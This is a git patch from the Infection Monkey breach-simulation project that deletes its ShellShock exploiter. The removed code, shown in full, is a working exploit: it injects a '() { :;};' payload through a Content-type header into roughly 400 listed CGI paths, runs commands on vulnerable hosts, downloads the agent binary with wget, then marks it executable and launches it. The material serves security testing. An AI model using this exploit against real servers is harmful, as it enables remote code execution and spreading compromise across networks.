From 64b900b94d22e275df5cdec8ad3ec0904e44b343 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:26:25 +0100 Subject: [PATCH] Agent: Remove ShellShock exploiter --- monkey/infection_monkey/example.conf | 1 - monkey/infection_monkey/exploit/shellshock.py | 269 ------------ .../exploit/shellshock_resources.py | 408 ------------------ 3 files changed, 678 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/shellshock.py delete mode 100644 monkey/infection_monkey/exploit/shellshock_resources.py diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index a0bf5f414..efb9a4350 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -27,7 +27,6 @@ "SSHExploiter", "SmbExploiter", "WmiExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py deleted file mode 100644 index f76739e1d..000000000 --- a/monkey/infection_monkey/exploit/shellshock.py +++ /dev/null @@ -1,269 +0,0 @@ -# Implementation is based on shellshock script provided -# https://github.com/nccgroup/shocker/blob/master/shocker.py - -import logging -import string -from random import SystemRandom - -import requests - -from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.shellshock_resources import CGI_FILES -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import DROPPER_ARG -from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -from infection_monkey.utils.commands import build_monkey_commandline - -logger = logging.getLogger(__name__) -TIMEOUT = 2 -TEST_COMMAND = "/bin/uname -a" -DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder -LOCK_HELPER_FILE = "/tmp/monkey_shellshock" - - -class ShellShockExploiter(HostExploiter): - _attacks = {"Content-type": "() { :;}; echo; "} - - _TARGET_OS_TYPE = ["linux"] - _EXPLOITED_SERVICE = "Bash" - - def __init__(self, host): - super(ShellShockExploiter, self).__init__(host) - self.HTTP = [str(port) for port in self._config.HTTP_PORTS] - safe_random = SystemRandom() - self.success_flag = "".join( - safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20) - ) - - def _exploit_host(self): - # start by picking ports - candidate_services = { - service: self.host.services[service] - for service in self.host.services - if ("name" in self.host.services[service]) - and (self.host.services[service]["name"] == "http") - } - - valid_ports = [ - (port, candidate_services["tcp-" + str(port)]["data"][1]) - for port in self.HTTP - if "tcp-" + str(port) in candidate_services - ] - http_ports = [port[0] for port in valid_ports if not port[1]] - https_ports = [port[0] for port in valid_ports if port[1]] - - logger.info( - "Scanning %s, ports [%s] for vulnerable CGI pages" - % (self.host, ",".join([str(port[0]) for port in valid_ports])) - ) - - attackable_urls = [] - # now for each port we want to check the entire URL list - for port in http_ports: - urls = self.check_urls(self.host.ip_addr, port) - attackable_urls.extend(urls) - for port in https_ports: - urls = self.check_urls(self.host.ip_addr, port, is_https=True) - attackable_urls.extend(urls) - # now for each URl we want to try and see if it's attackable - exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls] - exploitable_urls = [url for url in exploitable_urls if url[0] is True] - - # we want to report all vulnerable URLs even if we didn't succeed - self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls] - - # now try URLs until we install something on victim - for _, url, header, exploit in exploitable_urls: - logger.info("Trying to attack host %s with %s URL" % (self.host, url)) - # same attack script as sshexec - # for any failure, quit and don't try other URLs - if not self.host.os.get("type"): - try: - uname_os_attack = exploit + "/bin/uname -o" - uname_os = self.attack_page(url, header, uname_os_attack) - if "linux" in uname_os: - self.host.os["type"] = "linux" - else: - logger.info("SSH Skipping unknown os: %s", uname_os) - return False - except Exception as exc: - logger.debug( - "Error running uname os command on victim %r: (%s)", self.host, exc - ) - return False - if not self.host.os.get("machine"): - try: - uname_machine_attack = exploit + "/bin/uname -m" - uname_machine = self.attack_page(url, header, uname_machine_attack) - if "" != uname_machine: - self.host.os["machine"] = uname_machine.lower().strip() - except Exception as exc: - logger.debug( - "Error running uname machine command on victim %r: (%s)", self.host, exc - ) - return False - - # copy the monkey - dropper_target_path_linux = self._config.dropper_target_path_linux - - src_path = get_target_monkey(self.host) - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - if not self._create_lock_file(exploit, url, header): - logger.info("Another monkey is running shellshock exploit") - return True - - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - - if not http_path: - logger.debug("Exploiter ShellShock failed, http transfer creation failed.") - return False - - download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux) - - download = exploit + download_command - self.attack_page( - url, header, download - ) # we ignore failures here since it might take more than TIMEOUT time - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - self._remove_lock_file(exploit, url, header) - - if (http_thread.downloads != 1) or ( - "ELF" - not in self.check_remote_file_exists( - url, header, exploit, dropper_target_path_linux - ) - ): - logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) - continue - - # turn the monkey into an executable - chmod = "/bin/chmod +x %s" % dropper_target_path_linux - run_path = exploit + chmod - self.attack_page(url, header, run_path) - T1222Telem(ScanStatus.USED, chmod, self.host).send() - - # run the monkey - cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline( - self.host, - get_monkey_depth() - 1, - dropper_target_path_linux, - ) - cmdline += " & " - run_path = exploit + cmdline - self.attack_page(url, header, run_path) - - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, - self.host, - cmdline, - ) - - if not ( - self.check_remote_file_exists( - url, header, exploit, self._config.monkey_log_path_linux - ) - ): - logger.info("Log file does not exist, monkey might not have run") - continue - self.add_executed_cmd(cmdline) - return True - - return False - - @classmethod - def check_remote_file_exists(cls, url, header, exploit, file_path): - """ - Checks if a remote file exists and returns the content if so - file_path should be fully qualified - """ - cmdline = "/usr/bin/head -c 4 %s" % file_path - run_path = exploit + cmdline - resp = cls.attack_page(url, header, run_path) - if resp: - logger.info("File %s exists on remote host" % file_path) - return resp - - def attempt_exploit(self, url, attacks=None): - # Flag used to identify whether the exploit has successfully caused the - # server to return a useful response - - if not attacks: - attacks = self._attacks - - logger.debug("Attack Flag is: %s" % self.success_flag) - - logger.debug("Trying exploit for %s" % url) - for header, exploit in list(attacks.items()): - attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND - result = self.attack_page(url, header, attack) - if self.success_flag in result: - logger.info("URL %s looks vulnerable" % url) - return True, url, header, exploit - else: - logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) - return (False,) - - def _create_lock_file(self, exploit, url, header): - if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): - return False - cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - return True - - def _remove_lock_file(self, exploit, url, header): - cmd = exploit + "rm %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - - @staticmethod - def attack_page(url, header, attack): - result = "" - try: - logger.debug("Header is: %s" % header) - logger.debug("Attack is: %s" % attack) - r = requests.get( # noqa: DUO123 - url, headers={header: attack}, verify=False, timeout=TIMEOUT - ) - result = r.content.decode() - return result - except requests.exceptions.RequestException as exc: - logger.debug("Failed to run, exception %s" % exc) - return result - - @staticmethod - def check_urls(host, port, is_https=False, url_list=CGI_FILES): - """ - Checks if which urls exist - :return: Sequence of URLs to try and attack - """ - attack_path = "http://" - if is_https: - attack_path = "https://" - attack_path = attack_path + str(host) + ":" + str(port) - reqs = [] - timeout = False - attack_urls = [attack_path + url for url in url_list] - for u in attack_urls: - try: - reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123 - except requests.Timeout: - timeout = True - break - if timeout: - logger.debug( - "Some connections timed out while sending request to potentially vulnerable " - "urls." - ) - valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] - urls = [resp.url for resp in valid_resps] - - return urls diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py deleted file mode 100644 index 3a128b23e..000000000 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ /dev/null @@ -1,408 +0,0 @@ -# resource for shellshock attack -# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list - -CGI_FILES = ( - r"/", - r"/admin.cgi", - r"/administrator.cgi", - r"/agora.cgi", - r"/aktivate/cgi-bin/catgy.cgi", - r"/analyse.cgi", - r"/apps/web/vs_diag.cgi", - r"/axis-cgi/buffer/command.cgi", - r"/b2-include/b2edit.showposts.php", - r"/bandwidth/index.cgi", - r"/bigconf.cgi", - r"/cartcart.cgi", - r"/cart.cgi", - r"/ccbill/whereami.cgi", - r"/cgi-bin/14all-1.1.cgi", - r"/cgi-bin/14all.cgi", - r"/cgi-bin/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp4.cgi", - r"/cgi-bin/addbanner.cgi", - r"/cgi-bin/add_ftp.cgi", - r"/cgi-bin/adduser.cgi", - r"/cgi-bin/admin/admin.cgi", - r"/cgi-bin/admin.cgi", - r"/cgi-bin/admin/getparam.cgi", - r"/cgi-bin/adminhot.cgi", - r"/cgi-bin/admin.pl", - r"/cgi-bin/admin/setup.cgi", - r"/cgi-bin/adminwww.cgi", - r"/cgi-bin/af.cgi", - r"/cgi-bin/aglimpse.cgi", - r"/cgi-bin/alienform.cgi", - r"/cgi-bin/AnyBoard.cgi", - r"/cgi-bin/architext_query.cgi", - r"/cgi-bin/astrocam.cgi", - r"/cgi-bin/AT-admin.cgi", - r"/cgi-bin/AT-generate.cgi", - r"/cgi-bin/auction/auction.cgi", - r"/cgi-bin/auktion.cgi", - r"/cgi-bin/ax-admin.cgi", - r"/cgi-bin/ax.cgi", - r"/cgi-bin/axs.cgi", - r"/cgi-bin/badmin.cgi", - r"/cgi-bin/banner.cgi", - r"/cgi-bin/bannereditor.cgi", - r"/cgi-bin/bb-ack.sh", - r"/cgi-bin/bb-histlog.sh", - r"/cgi-bin/bb-hist.sh", - r"/cgi-bin/bb-hostsvc.sh", - r"/cgi-bin/bb-replog.sh", - r"/cgi-bin/bb-rep.sh", - r"/cgi-bin/bbs_forum.cgi", - r"/cgi-bin/bigconf.cgi", - r"/cgi-bin/bizdb1-search.cgi", - r"/cgi-bin/blog/mt-check.cgi", - r"/cgi-bin/blog/mt-load.cgi", - r"/cgi-bin/bnbform.cgi", - r"/cgi-bin/book.cgi", - r"/cgi-bin/boozt/admin/index.cgi", - r"/cgi-bin/bsguest.cgi", - r"/cgi-bin/bslist.cgi", - r"/cgi-bin/build.cgi", - r"/cgi-bin/bulk/bulk.cgi", - r"/cgi-bin/cached_feed.cgi", - r"/cgi-bin/cachemgr.cgi", - r"/cgi-bin/calendar/index.cgi", - r"/cgi-bin/cartmanager.cgi", - r"/cgi-bin/cbmc/forums.cgi", - r"/cgi-bin/ccvsblame.cgi", - r"/cgi-bin/c_download.cgi", - r"/cgi-bin/cgforum.cgi", - r"/cgi-bin/.cgi", - r"/cgi-bin/cgi_process", - r"/cgi-bin/classified.cgi", - r"/cgi-bin/classifieds.cgi", - r"/cgi-bin/classifieds/classifieds.cgi", - r"/cgi-bin/classifieds/index.cgi", - r"/cgi-bin/.cobalt/alert/service.cgi", - r"/cgi-bin/.cobalt/message/message.cgi", - r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi", - r"/cgi-bin/commandit.cgi", - r"/cgi-bin/commerce.cgi", - r"/cgi-bin/common/listrec.pl", - r"/cgi-bin/compatible.cgi", - r"/cgi-bin/Count.cgi", - r"/cgi-bin/csChatRBox.cgi", - r"/cgi-bin/csGuestBook.cgi", - r"/cgi-bin/csLiveSupport.cgi", - r"/cgi-bin/CSMailto.cgi", - r"/cgi-bin/CSMailto/CSMailto.cgi", - r"/cgi-bin/csNews.cgi", - r"/cgi-bin/csNewsPro.cgi", - r"/cgi-bin/csPassword.cgi", - r"/cgi-bin/csPassword/csPassword.cgi", - r"/cgi-bin/csSearch.cgi", - r"/cgi-bin/csv_db.cgi", - r"/cgi-bin/cvsblame.cgi", - r"/cgi-bin/cvslog.cgi", - r"/cgi-bin/cvsquery.cgi", - r"/cgi-bin/cvsqueryform.cgi", - r"/cgi-bin/day5datacopier.cgi", - r"/cgi-bin/day5datanotifier.cgi", - r"/cgi-bin/db_manager.cgi", - r"/cgi-bin/dbman/db.cgi", - r"/cgi-bin/dcforum.cgi", - r"/cgi-bin/dcshop.cgi", - r"/cgi-bin/dfire.cgi", - r"/cgi-bin/diagnose.cgi", - r"/cgi-bin/dig.cgi", - r"/cgi-bin/directorypro.cgi", - r"/cgi-bin/download.cgi", - r"/cgi-bin/e87_Ba79yo87.cgi", - r"/cgi-bin/emu/html/emumail.cgi", - r"/cgi-bin/emumail.cgi", - r"/cgi-bin/emumail/emumail.cgi", - r"/cgi-bin/enter.cgi", - r"/cgi-bin/environ.cgi", - r"/cgi-bin/ezadmin.cgi", - r"/cgi-bin/ezboard.cgi", - r"/cgi-bin/ezman.cgi", - r"/cgi-bin/ezshopper2/loadpage.cgi", - r"/cgi-bin/ezshopper3/loadpage.cgi", - r"/cgi-bin/ezshopper/loadpage.cgi", - r"/cgi-bin/ezshopper/search.cgi", - r"/cgi-bin/faqmanager.cgi", - r"/cgi-bin/FileSeek2.cgi", - r"/cgi-bin/FileSeek.cgi", - r"/cgi-bin/finger.cgi", - r"/cgi-bin/flexform.cgi", - r"/cgi-bin/fom.cgi", - r"/cgi-bin/fom/fom.cgi", - r"/cgi-bin/FormHandler.cgi", - r"/cgi-bin/FormMail.cgi", - r"/cgi-bin/gbadmin.cgi", - r"/cgi-bin/gbook/gbook.cgi", - r"/cgi-bin/generate.cgi", - r"/cgi-bin/getdoc.cgi", - r"/cgi-bin/gH.cgi", - r"/cgi-bin/gm-authors.cgi", - r"/cgi-bin/gm.cgi", - r"/cgi-bin/gm-cplog.cgi", - r"/cgi-bin/guestbook.cgi", - r"/cgi-bin/handler", - r"/cgi-bin/handler.cgi", - r"/cgi-bin/handler/netsonar", - r"/cgi-bin/hitview.cgi", - r"/cgi-bin/hsx.cgi", - r"/cgi-bin/html2chtml.cgi", - r"/cgi-bin/html2wml.cgi", - r"/cgi-bin/htsearch.cgi", - r"/cgi-bin/hw.sh", # testing - r"/cgi-bin/icat", - r"/cgi-bin/if/admin/nph-build.cgi", - r"/cgi-bin/ikonboard/help.cgi", - r"/cgi-bin/ImageFolio/admin/admin.cgi", - r"/cgi-bin/imageFolio.cgi", - r"/cgi-bin/index.cgi", - r"/cgi-bin/infosrch.cgi", - r"/cgi-bin/jammail.pl", - r"/cgi-bin/journal.cgi", - r"/cgi-bin/lastlines.cgi", - r"/cgi-bin/loadpage.cgi", - r"/cgi-bin/login.cgi", - r"/cgi-bin/logit.cgi", - r"/cgi-bin/log-reader.cgi", - r"/cgi-bin/lookwho.cgi", - r"/cgi-bin/lwgate.cgi", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/magiccard.cgi", - r"/cgi-bin/mail/emumail.cgi", - r"/cgi-bin/maillist.cgi", - r"/cgi-bin/mailnews.cgi", - r"/cgi-bin/mail/nph-mr.cgi", - r"/cgi-bin/main.cgi", - r"/cgi-bin/main_menu.pl", - r"/cgi-bin/man.sh", - r"/cgi-bin/mini_logger.cgi", - r"/cgi-bin/mmstdod.cgi", - r"/cgi-bin/moin.cgi", - r"/cgi-bin/mojo/mojo.cgi", - r"/cgi-bin/mrtg.cgi", - r"/cgi-bin/mt.cgi", - r"/cgi-bin/mt/mt.cgi", - r"/cgi-bin/mt/mt-check.cgi", - r"/cgi-bin/mt/mt-load.cgi", - r"/cgi-bin/mt-static/mt-check.cgi", - r"/cgi-bin/mt-static/mt-load.cgi", - r"/cgi-bin/musicqueue.cgi", - r"/cgi-bin/myguestbook.cgi", - r"/cgi-bin/.namazu.cgi", - r"/cgi-bin/nbmember.cgi", - r"/cgi-bin/netauth.cgi", - r"/cgi-bin/netpad.cgi", - r"/cgi-bin/newsdesk.cgi", - r"/cgi-bin/nlog-smb.cgi", - r"/cgi-bin/nph-emumail.cgi", - r"/cgi-bin/nph-exploitscanget.cgi", - r"/cgi-bin/nph-publish.cgi", - r"/cgi-bin/nph-test.cgi", - r"/cgi-bin/pagelog.cgi", - r"/cgi-bin/pbcgi.cgi", - r"/cgi-bin/perlshop.cgi", - r"/cgi-bin/pfdispaly.cgi", - r"/cgi-bin/pfdisplay.cgi", - r"/cgi-bin/phf.cgi", - r"/cgi-bin/photo/manage.cgi", - r"/cgi-bin/photo/protected/manage.cgi", - r"/cgi-bin/php-cgi", - r"/cgi-bin/php.cgi", - r"/cgi-bin/php.fcgi", - r"/cgi-bin/ping.sh", - r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi", - r"/cgi-bin/pollssi.cgi", - r"/cgi-bin/postcards.cgi", - r"/cgi-bin/powerup/r.cgi", - r"/cgi-bin/printenv", - r"/cgi-bin/probecontrol.cgi", - r"/cgi-bin/profile.cgi", - r"/cgi-bin/publisher/search.cgi", - r"/cgi-bin/quickstore.cgi", - r"/cgi-bin/quizme.cgi", - r"/cgi-bin/ratlog.cgi", - r"/cgi-bin/r.cgi", - r"/cgi-bin/register.cgi", - r"/cgi-bin/replicator/webpage.cgi/", - r"/cgi-bin/responder.cgi", - r"/cgi-bin/robadmin.cgi", - r"/cgi-bin/robpoll.cgi", - r"/cgi-bin/rtpd.cgi", - r"/cgi-bin/sbcgi/sitebuilder.cgi", - r"/cgi-bin/scoadminreg.cgi", - r"/cgi-bin-sdb/printenv", - r"/cgi-bin/sdbsearch.cgi", - r"/cgi-bin/search", - r"/cgi-bin/search.cgi", - r"/cgi-bin/search/search.cgi", - r"/cgi-bin/sendform.cgi", - r"/cgi-bin/shop.cgi", - r"/cgi-bin/shopper.cgi", - r"/cgi-bin/shopplus.cgi", - r"/cgi-bin/showcheckins.cgi", - r"/cgi-bin/simplestguest.cgi", - r"/cgi-bin/simplestmail.cgi", - r"/cgi-bin/smartsearch.cgi", - r"/cgi-bin/smartsearch/smartsearch.cgi", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/sojourn.cgi", - r"/cgi-bin/spin_client.cgi", - r"/cgi-bin/start.cgi", - r"/cgi-bin/status", - r"/cgi-bin/status_cgi", - r"/cgi-bin/store/agora.cgi", - r"/cgi-bin/store.cgi", - r"/cgi-bin/store/index.cgi", - r"/cgi-bin/survey.cgi", - r"/cgi-bin/sync.cgi", - r"/cgi-bin/talkback.cgi", - r"/cgi-bin/technote/main.cgi", - r"/cgi-bin/test2.pl", - r"/cgi-bin/test-cgi", - r"/cgi-bin/test.cgi", - r"/cgi-bin/testing_whatever", - r"/cgi-bin/test/test.cgi", - r"/cgi-bin/tidfinder.cgi", - r"/cgi-bin/tigvote.cgi", - r"/cgi-bin/title.cgi", - r"/cgi-bin/top.cgi", - r"/cgi-bin/traffic.cgi", - r"/cgi-bin/troops.cgi", - r"/cgi-bin/ttawebtop.cgi/", - r"/cgi-bin/ultraboard.cgi", - r"/cgi-bin/upload.cgi", - r"/cgi-bin/urlcount.cgi", - r"/cgi-bin/viewcvs.cgi", - r"/cgi-bin/view_help.cgi", - r"/cgi-bin/viralator.cgi", - r"/cgi-bin/virgil.cgi", - r"/cgi-bin/vote.cgi", - r"/cgi-bin/vpasswd.cgi", - r"/cgi-bin/way-board.cgi", - r"/cgi-bin/way-board/way-board.cgi", - r"/cgi-bin/webbbs.cgi", - r"/cgi-bin/webcart/webcart.cgi", - r"/cgi-bin/webdist.cgi", - r"/cgi-bin/webif.cgi", - r"/cgi-bin/webmail/html/emumail.cgi", - r"/cgi-bin/webmap.cgi", - r"/cgi-bin/webspirs.cgi", - r"/cgi-bin/Web_Store/web_store.cgi", - r"/cgi-bin/whois.cgi", - r"/cgi-bin/whois_raw.cgi", - r"/cgi-bin/whois/whois.cgi", - r"/cgi-bin/wrap", - r"/cgi-bin/wrap.cgi", - r"/cgi-bin/wwwboard.cgi.cgi", - r"/cgi-bin/YaBB/YaBB.cgi", - r"/cgi-bin/zml.cgi", - r"/cgi-mod/index.cgi", - r"/cgis/wwwboard/wwwboard.cgi", - r"/cgi-sys/addalink.cgi", - r"/cgi-sys/defaultwebpage.cgi", - r"/cgi-sys/domainredirect.cgi", - r"/cgi-sys/entropybanner.cgi", - r"/cgi-sys/entropysearch.cgi", - r"/cgi-sys/FormMail-clone.cgi", - r"/cgi-sys/helpdesk.cgi", - r"/cgi-sys/mchat.cgi", - r"/cgi-sys/randhtml.cgi", - r"/cgi-sys/realhelpdesk.cgi", - r"/cgi-sys/realsignup.cgi", - r"/cgi-sys/signup.cgi", - r"/connector.cgi", - r"/cp/rac/nsManager.cgi", - r"/create_release.sh", - r"/CSNews.cgi", - r"/csPassword.cgi", - r"/dcadmin.cgi", - r"/dcboard.cgi", - r"/dcforum.cgi", - r"/dcforum/dcforum.cgi", - r"/debuff.cgi", - r"/debug.cgi", - r"/details.cgi", - r"/edittag/edittag.cgi", - r"/emumail.cgi", - r"/enter_buff.cgi", - r"/enter_bug.cgi", - r"/ez2000/ezadmin.cgi", - r"/ez2000/ezboard.cgi", - r"/ez2000/ezman.cgi", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo2", - r"/fcgi-bin/echo2", - r"/Gozila.cgi", - r"/hitmatic/analyse.cgi", - r"/hp_docs/cgi-bin/index.cgi", - r"/html/cgi-bin/cgicso", - r"/html/cgi-bin/cgicso", - r"/index.cgi", - r"/info.cgi", - r"/infosrch.cgi", - r"/login.cgi", - r"/mailview.cgi", - r"/main.cgi", - r"/megabook/admin.cgi", - r"/ministats/admin.cgi", - r"/mods/apage/apage.cgi", - r"/_mt/mt.cgi", - r"/musicqueue.cgi", - r"/ncbook.cgi", - r"/newpro.cgi", - r"/newsletter.sh", - r"/oem_webstage/cgi-bin/oemapp_cgi", - r"/page.cgi", - r"/parse_xml.cgi", - r"/photodata/manage.cgi", - r"/photo/manage.cgi", - r"/print.cgi", - r"/process_buff.cgi", - r"/process_bug.cgi", - r"/pub/english.cgi", - r"/quikmail/nph-emumail.cgi", - r"/quikstore.cgi", - r"/reviews/newpro.cgi", - r"/ROADS/cgi-bin/search.pl", - r"/sample01.cgi", - r"/sample02.cgi", - r"/sample03.cgi", - r"/sample04.cgi", - r"/sampleposteddata.cgi", - r"/scancfg.cgi", - r"/scancfg.cgi", - r"/servers/link.cgi", - r"/setpasswd.cgi", - r"/SetSecurity.shm", - r"/shop/member_html.cgi", - r"/shop/normal_html.cgi", - r"/site_searcher.cgi", - r"/siteUserMod.cgi", - r"/submit.cgi", - r"/technote/print.cgi", - r"/template.cgi", - r"/test.cgi", - r"/ucsm/isSamInstalled.cgi", - r"/upload.cgi", - r"/userreg.cgi", - r"/users/scripts/submit.cgi", - r"/vood/cgi-bin/vood_view.cgi", - r"/Web_Store/web_store.cgi", - r"/webtools/bonsai/ccvsblame.cgi", - r"/webtools/bonsai/cvsblame.cgi", - r"/webtools/bonsai/cvslog.cgi", - r"/webtools/bonsai/cvsquery.cgi", - r"/webtools/bonsai/cvsqueryform.cgi", - r"/webtools/bonsai/showcheckins.cgi", - r"/wwwadmin.cgi", - r"/wwwboard.cgi", - r"/wwwboard/wwwboard.cgi", -)